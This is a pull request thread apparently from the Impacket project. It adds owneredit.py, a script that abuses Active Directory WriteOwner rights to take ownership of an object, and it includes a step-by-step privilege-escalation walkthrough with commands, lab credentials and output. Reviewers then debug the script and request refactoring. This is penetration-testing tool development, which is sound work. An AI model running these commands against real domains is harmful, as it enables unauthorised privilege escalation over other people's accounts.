### PR TITLE
[owneredit.py] New example script to change an object's owner

### PR DESCRIPTION
**Pull request by ShutdownRepo**
Added this script to abuse WriteOwner (`ADS_RIGHT_WRITE_OWNER`) access rights. This allows to take ownership of another object, and then edit that object's DACL (with #1291 for example).

## 1. Edit DACL : failure

Trying to edit an `victim`'s DACL (with #1291) . But it doesn't work, `attacker` doesn't have WriteDACL, and is not owner of `victim`.
```
# dacledit.py -principal 'attacker' -target 'victim' -dc-ip '192.168.56.101' 'domain.local'/'attacker':'123Pentest!!!' -action write -rights FullControl
Impacket v0.10.1.dev1+20220508.142945.5eb53ce9 - Copyright 2022 SecureAuth Corporation

[*] DACL backed up to dacledit-20220514-184038.bak
[-] Could not modify object, the server reports insufficient rights: 00000005: SecErr: DSID-03152857, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
```

## 2. Edit Owner

Now using owneredit to change `victim`'s owner to `attacker`.
```
# python3 examples/owneredit.py -target 'victim' domain.local/domainadmin:belikewater -dc-ip 192.168.56.101 -action write -new-owner attacker       
Impacket v0.9.25.dev1+20220501.152640.c5d141e1 - Copyright 2021 SecureAuth Corporation

[*] Current owner information below
[*] - SID: S-1-5-21-229151724-2089186347-2907854869-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=domain,DC=local
[*] OwnerSid modified successfully!
[*] Current owner information below
[*] - SID: S-1-5-21-229151724-2089186347-2907854869-1118
[*] - sAMAccountName: attacker
[*] - distinguishedName: CN=attacker,CN=Users,DC=domain,DC=local
```

## 3. Edit DACL : success

```
# dacledit.py -principal 'attacker' -target 'victim' -dc-ip '192.168.56.101' 'domain.local'/'attacker':'123Pentest!!!' -action remove -rights FullControl
Impacket v0.10.1.dev1+20220508.142945.5eb53ce9 - Copyright 2022 SecureAuth Corporation

[*] DACL backed up to dacledit-20220514-184128.bak
[*] DACL modified successfully!
```
```
# dacledit.py -principal 'attacker' -target 'victim' -dc-ip '192.168.56.101' 'domain.local'/'attacker':'123Pentest!!!'                                   
Impacket v0.10.1.dev1+20220508.142945.5eb53ce9 - Copyright 2022 SecureAuth Corporation

[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-229151724-2089186347-2907854869-1118)
[*]   ACE[20] info                
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : None
[*]     Access mask               : FullControl (0xf01ff)
[*]     Trustee (SID)             : attacker (S-1-5-21-229151724-2089186347-2907854869-1118)
```

## Usage

Script accepts target and new owner in multiple formats (sAMAccountName, Security IDentifier or distinguishedName)
```
owner:
  Object, controlled by the attacker, to set as owner of the target object

  -new-owner NAME       sAMAccountName
  -new-owner-sid SID    Security IDentifier
  -new-owner-dn DN      Distinguished Name

target:
  Target object to edit the owner of

  -target NAME          sAMAccountName
  -target-sid SID       Security IDentifier
  -target-dn DN         Distinguished Name

dacl editor:
  -action [{read,write}]
                        Action to operate on the owner attribute
```

### CODE REVIEW

**Comment by ShutdownRepo** [comment]
This script needs testing. In my lab, I have an issue when changing the owner of an object when A to B then B to A.
A to B works when I have WriteOwner rights, which is expected. But then reverting B to A (using the same creds of the user with WriteOwner permissions) throws a constraint violation.

```
[-] Could not modify object, the server reports a constrained violation: 0000051B: AtrErr: DSID-030F2312, #1:
	0: 0000051B: DSID-030F2312, problem 1005 (CONSTRAINT_ATT_TYPE), data 0, Att 20119 (nTSecurityDescriptor)
```

If anyone could test in their lab and help me find out the issue it'd be awesome :smiley:

**Comment by BlWasp** [comment]
The script works perfectly in my lab, even in the scenario "from A to B then B to A". I haven't seen any issue for the moment:

```bash
> owneredit.py -new-owner BlWasp -target BlWasp -dc-ip 192.168.1.75 -action write 'LAB'/'Administrator':'Password123!'
Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation

[*] Current owner information below
[*] - SID: S-1-5-21-2570265163-3918697770-3667495639-500
[*] - sAMAccountName: Administrator
[*] - distinguishedName: CN=Administrator,CN=Users,DC=lab,DC=local
[*] OwnerSid modified successfully!

> owneredit.py -target BlWasp -dc-ip 192.168.1.75 -action read 'LAB'/'Administrator':'Password123!'
Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation

[*] Current owner information below
[*] - SID: S-1-5-21-2570265163-3918697770-3667495639-1103
[*] - sAMAccountName: blwasp
[*] - distinguishedName: CN=Black Wasp,CN=Users,DC=lab,DC=local

> owneredit.py -new-owner Administrator -target BlWasp -dc-ip 192.168.1.75 -action write 'LAB'/'Administrator':'Password123!'
Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation

[*] Current owner information below
[*] - SID: S-1-5-21-2570265163-3918697770-3667495639-1103
[*] - sAMAccountName: blwasp
[*] - distinguishedName: CN=Black Wasp,CN=Users,DC=lab,DC=local
[*] OwnerSid modified successfully!

> owneredit.py -target BlWasp -dc-ip 192.168.1.75 -action read 'LAB'/'Administrator':'Password123!'
Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation

[*] Current owner information below
[*] - SID: S-1-5-21-2570265163-3918697770-3667495639-500
[*] - sAMAccountName: Administrator
[*] - distinguishedName: CN=Administrator,CN=Users,DC=lab,DC=local
```

**Comment by ShutdownRepo** [comment]
> The script works perfectly in my lab, even in the scenario "from A to B then B to A". I haven't seen any issue for the moment:
> 
> ```shell
> > owneredit.py -new-owner BlWasp -target BlWasp -dc-ip 192.168.1.75 -action write 'LAB'/'Administrator':'Password123!'
> Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> 
> [*] Current owner information below
> [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-500
> [*] - sAMAccountName: Administrator
> [*] - distinguishedName: CN=Administrator,CN=Users,DC=lab,DC=local
> [*] OwnerSid modified successfully!
> 
> > owneredit.py -target BlWasp -dc-ip 192.168.1.75 -action read 'LAB'/'Administrator':'Password123!'
> Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> 
> [*] Current owner information below
> [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-1103
> [*] - sAMAccountName: blwasp
> [*] - distinguishedName: CN=Black Wasp,CN=Users,DC=lab,DC=local
> 
> > owneredit.py -new-owner Administrator -target BlWasp -dc-ip 192.168.1.75 -action write 'LAB'/'Administrator':'Password123!'
> Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> 
> [*] Current owner information below
> [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-1103
> [*] - sAMAccountName: blwasp
> [*] - distinguishedName: CN=Black Wasp,CN=Users,DC=lab,DC=local
> [*] OwnerSid modified successfully!
> 
> > owneredit.py -target BlWasp -dc-ip 192.168.1.75 -action read 'LAB'/'Administrator':'Password123!'
> Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> 
> [*] Current owner information below
> [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-500
> [*] - sAMAccountName: Administrator
> [*] - distinguishedName: CN=Administrator,CN=Users,DC=lab,DC=local
> ```

Thank you for testing! I didn't specify it in my previous comment but I wasn't facing this issue when using a domain administrator account. It was happening when abusing `WriteOwner` permissions.

**Comment by BlWasp** [comment]
> > The script works perfectly in my lab, even in the scenario "from A to B then B to A". I haven't seen any issue for the moment:
> > ```shell
> > > owneredit.py -new-owner BlWasp -target BlWasp -dc-ip 192.168.1.75 -action write 'LAB'/'Administrator':'Password123!'
> > Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> > 
> > [*] Current owner information below
> > [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-500
> > [*] - sAMAccountName: Administrator
> > [*] - distinguishedName: CN=Administrator,CN=Users,DC=lab,DC=local
> > [*] OwnerSid modified successfully!
> > 
> > > owneredit.py -target BlWasp -dc-ip 192.168.1.75 -action read 'LAB'/'Administrator':'Password123!'
> > Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> > 
> > [*] Current owner information below
> > [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-1103
> > [*] - sAMAccountName: blwasp
> > [*] - distinguishedName: CN=Black Wasp,CN=Users,DC=lab,DC=local
> > 
> > > owneredit.py -new-owner Administrator -target BlWasp -dc-ip 192.168.1.75 -action write 'LAB'/'Administrator':'Password123!'
> > Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> > 
> > [*] Current owner information below
> > [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-1103
> > [*] - sAMAccountName: blwasp
> > [*] - distinguishedName: CN=Black Wasp,CN=Users,DC=lab,DC=local
> > [*] OwnerSid modified successfully!
> > 
> > > owneredit.py -target BlWasp -dc-ip 192.168.1.75 -action read 'LAB'/'Administrator':'Password123!'
> > Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> > 
> > [*] Current owner information below
> > [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-500
> > [*] - sAMAccountName: Administrator
> > [*] - distinguishedName: CN=Administrator,CN=Users,DC=lab,DC=local
> > ```
> 
> Thank you for testing! I didn't specify it in my previous comment but I wasn't facing this issue when using a domain administrator account. It was happening when abusing `WriteOwner` permissions.

Ah yes exactly ! In my lab I encounter the same issue. More generally, it appears that after a owner modification, it is no more possible to change it with the script, but it is still possible to change the owner manually via the **ADSI Edit** tool on the Domain Controller.
However, even after this manual modification it seems that the script still doesn't work and the same error returns for any new owner different from "B" (it is still possible to modify the owner to the same value that what set during "A to B").

**Comment by BlWasp** [comment]
Anything new about this ?

**Comment by ShutdownRepo** [comment]
> Anything new about this ?

@anadrianmanrique  ?

**Comment by anadrianmanrique** [comment]
@ShutdownRepo hello! I'm going to be reviewing this one for 0.12 release. This one seems like shuld've been integrated after dacledit.py. In the meanwhile, there's duplicated code that could be moved to the lib. I'll specify this in the code review section.

File: examples/owneredit.py [hunk 1]
```diff
@@ -0,0 +1,517 @@
+#!/usr/bin/env python3
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
```
Comment (anadrianmanrique) [inline examples/owneredit.py:4]: update copyright notice to : Copyright (C) 2024 Fortra. All rights reserved.

File: examples/owneredit.py [hunk 2]
```diff
@@ -0,0 +1,517 @@
...
+from impacket import version
+from impacket.examples import logger, utils
+from impacket.ldap import ldaptypes
+from impacket.smbconnection import SMBConnection
+from impacket.spnego import SPNEGO_NegTokenInit, TypesMech
+from ldap3.utils.conv import escape_filter_chars
+from ldap3.protocol.microsoft import security_descriptor_control
+
+
+# Universal SIDs
```
Comment (anadrianmanrique) [inline examples/owneredit.py:36]: move this to a lib, to be used by dacledit.py and this one Also consider fixing single backslash issue in lines 94 to 111. ( see PR #1742 )

File: examples/owneredit.py [hunk 3]
```diff
@@ -0,0 +1,517 @@
...
+                logging.error('Could not modify object, the server reports insufficient rights: %s',
+                              self.ldap_session.result['message'])
+            elif self.ldap_session.result['result'] == 19:
+                logging.error('Could not modify object, the server reports a constrained violation: %s',
+                              self.ldap_session.result['message'])
+            else:
+                logging.error('The server returned an error: %s', self.ldap_session.result['message'])
+
+    # Attempts to retrieve the Security Descriptor of the specified target
+    def search_target_principal_security_descriptor(self):
```
Comment (anadrianmanrique) [inline examples/owneredit.py:192]: move duplicated function ( and resolveSID also ) to a lib ( i.e. impacket/examples/ldap_helpers.py ) to be used by dacledit.py and this one

**Review by anadrianmanrique — CHANGES_REQUESTED** [review]

**Comment by anadrianmanrique** [comment]
Ok, I'll move forward with this. I'll merge this once finished with testing, and the apply changes in a sperate PR.
thanks

**Comment by ShutdownRepo** [comment]
Sorry I can't find the time to do the changes for now...

**Pull request merged**